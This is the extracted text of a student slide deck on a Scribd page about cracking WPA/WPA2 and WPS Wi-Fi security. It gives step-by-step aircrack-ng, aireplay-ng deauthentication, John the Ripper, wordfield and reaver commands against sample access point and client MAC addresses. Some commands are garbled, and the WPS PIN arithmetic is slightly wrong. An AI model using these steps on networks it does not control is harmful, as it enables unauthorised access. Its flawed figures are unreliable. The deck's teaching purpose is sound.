Scribd Logo
Upload

Welcome to Scribd!

  • WPA Exploitation in The World of Wireless Network

    Uploaded by

    BuyuangGarende
    96 views34 pages
    WPA Eksploitasi dalam dunia Jaringan Wireless

    Original Title

    WPA Exploitation in the world of Wireless Network

    Copyright

    © © All Rights Reserved

    Available Formats

    PPTX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    WPA Eksploitasi dalam dunia Jaringan Wireless

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    96 views34 pages

    WPA Exploitation in The World of Wireless Network

    Uploaded by

    BuyuangGarende
    WPA Eksploitasi dalam dunia Jaringan Wireless

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 34

    WPA EXPLOITATION IN THE WORLD OF

    WIRELESS NETWORK

    By Hariraj Rathod
    8th sem
    Department of Electronics and Communication

    WIFI WIRELESS FIDELITY


    Wi-Fi,

    is a popular technology that allows


    an electronic device to exchange data or
    connect to the internetwirelesslyusing
    radio waves.

    Wireless

    access allows users to connect to


    the internet from any location within
    range of a wireless access point.

    SOME BASIC TERMS

    MAC address or physical address is aunique


    identifier assigned tonetwork interfaces for
    communications

    Access point >> Wireless router

    SSID (service set identifier) >> Network Name

    BSSID (basic service set identification) >>


    MAC address of the access point

    BASIC WORKING
    When a user uses wireless internet they generate
    what are called data packets.
    Packets are transmitted between the wireless
    card and the wireless access point via radio
    waves whenever the computer is connected with
    the access point.

    BASIC WORKING CONTD.

    Depending on how long the computer is


    connected, it can generate a certain number of
    packets per day.
    The more users that are connected to one access
    point, the more packets are generated.

    WIRELESS USES RADIO


    FREQUENCY

    2.4 Ghz wifi spectrum

    WIRELESS ENCRYPTION
    The

    main source of vulnerability


    associated with wireless networks are the
    methods of encryption. Different type of
    wireless encryption are as follows:

    WEP
    WPA
    WPA2

    WEP

    Stands for Wired Equivalent Privacy.


    WEP is recognizable by the key of 10 or
    26hexadecimaldigits.
    WEP protocol was not developed by researchers
    or experts in security and cryptography.
    Initial bytes of the key stream depended on just a
    few bits of the encryption key.

    WEP CONTINUED

    WEP Encryption Process

    ICV:-32 bit integrity check value (ICV)


    IV:- Initialization Vector

    WEP CONTINUED

    WEP Decryption Process

    With multiple wireless clients sending a large amount of data, an attacker


    can remotely capture large amounts of WEP ciphertext and use
    cryptanalysis methods to determine the WEP key.

    WPA OR WPA2

    Stands for Wi-Fi Protected Access

    Created to provide stronger security

    Still able to be cracked if a short password is used.

    If a long passphrase or password is used, these protocol are


    virtually not crackable.
    WPA-PSK and TKIP(Temporal Key Integrity Protocol ) or AES(Advance
    Encryption Standard) use a Pre-Shared Key (PSK) that is more than7
    and less than 64 characters in length.
    WPS (WiFi protected Feature) simple plug and play feature.

    USING BACKTRACK >>


    Some

    Basic Backtrack Terms >>

    Wlan1

    wireless interface
    Mon0 monitor mode
    Handshake

    refers to the negotiation process between the


    computer and a WiFi server using WPA encryption.
    Needed to crack WPA/WPA2.

    Dictionary

    - consisting the list of common

    passwords.
    .cap file used to store packets.

    MONITOR MODE

    Monitor mode, or RFMON (Radio Frequency


    MONitor) mode, allows a computer with
    awireless network interface controller (WNIC) to
    monitor all traffic received from the wireless
    network.
    Monitor mode allows packets to be captured
    without having to associate with anaccess point
    first.

    TOOLS USED

    Airmon-ng >> Placing different cards in monitor


    mode
    Airodump-ng (Packet sniffer ) >> Tool used to listen to
    wireless routers in the area.
    Aireplay-ng ( Packet injector ) >> Aireplay-ng is used
    to inject frames.

    The primary function is to generate traffic for the later use


    inaircrack-ng for cracking the WEP and WPA-PSK keys.

    Aircrack-ng >> CracksWEPandWPA(Dictionary


    attack) keys.

    TOOLS USED.CONTINUED

    Word Field (Brute Force)

    Reaver Tool. (Brute Force)

    AIRCRACK-NG

    Selecting the Interface to put it in monitor mode.


    Command used airmon-ng start wlan1

    AIRCRACK-NG CONTINUED

    Start Capturing Packets.


    Airodump-ng mon0

    Airodump-ng mon0 channel 1 bssid mac


    id w reddot

    AIRCRACK-NG CONTINUED

    Deauthenticate the device connected to access


    point and force them to re exchange WPA key.
    Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 c
    90:4C:E5:B2:6F:D8 mon0 where "-0 4" tells
    aireplay to inject deauthentication packets (4 of
    them), "-a" is the wireless access point MAC
    address and "-c" is the client (victim) MAC
    address.

    AIRCRACK-NG CONTINUED

    Authentication process in WPA

    AIRCRACK-NG CONTINUED

    4-way handshake os captured.

    AIRCRACK-NG CONTINUED

    Cracking the WPA key using aircrack-ng,


    dictionary file and 4-way handshake captured file
    redot.cap aircrack-ng -w
    /home/pranav/download/password.lstb
    F4:EC:38:BA:6C:44 /home/pranav/reddot01.cap where "-w" specifies the dictionary file to
    use.

    JOHN THE RIPPER


    Faster then the previously used tool.
    /pentest/password/john-1.7.6.jumbo12/run/john
    -stdout -incremantal all aircrack-ng b
    00:17:9A:82:44:1B -w -/home/pranav/test-01.cap

    WORD FIELD
    Word Field is a brute force attack.
    Command line used wordfield [OPTION...]
    MINLENGTH [MAXLENGTH]
    Wordfield -a -n 8 8" will output all possible
    alphanumeric strings which are 8 characters
    long.
    wordfield -a -n 8 8 | aircrack-ng b
    00:17:9A:82:44:1B -w - /home/pranav/Wifire02.cap
    This attack is really effective on weak keys.

    WORD FIELD CONTINUED

    The below took 22 hrs 7 minutes and 35 seconds

    DICTIONARY AND BRUTE FORCE


    LIMITATIONS
    Passphrase cant be necessarily be found in
    Dictionary list hence it has its limitations.
    Brute force technics require lot of fast hardware
    computational power.

    Source: http://lastbit.com/pswcalc.asp

    REAVER TOOL.
    Reaver is fantastic tool to crack WPS pin
    written by Craig Heffner.
    This tool exploits the wps 8 digit pin.
    1 bit is a checksum bit.
    7 unknown numbers, meaning there are a
    possible 10^7 (10,000,000) combinations which
    will take approximately 116 days to break at 1
    attempt every second.

    REAVER TOOL CONTINUED

    WPS pin 65020920

    REAVER TOOL CONTINUED


    Finding WPS victim
    wash I mon0

    REAVER TOOL CONTINUED


    CRACKING TECHNIQUE
    WPS pin 6502-0920
    10^4 (10,000) combinations.
    But since 1st bit is checksum bit hence the
    combinations reduce to 10^3(1000)
    This reduces the time required to break the PIN
    to just over 3 hours - Again, assuming that 1
    attempt is made every second.

    REAVER TOOL CONTINUED

    reaver -i mon0 b F4:EC:38:BA:6C:44

    REAVER TOOL CONTINUED

    BESECURED

    REFERENCES
    Wi-Fi security WEP, WPA and WPA2 Guillaume
    Lehembre
    http://en.wikipedia.org/wiki/WiFi_Protected_Access#WPS_PIN_recovery
    https://sites.google.com/site/clickdeathsquad/Home/
    cds-wpacrack
    http://samiux.blogspot.in/2010/04/howtocrackwpawpa2-psk-with-john.html
    http://www.zer0trusion.com/2011/09/crackingwpawithout-dictionary.html
    Tactical Network Solutions
    WiFi Security Megaprimer by Vivek Ramchandran

    THANKS : )

    You might also like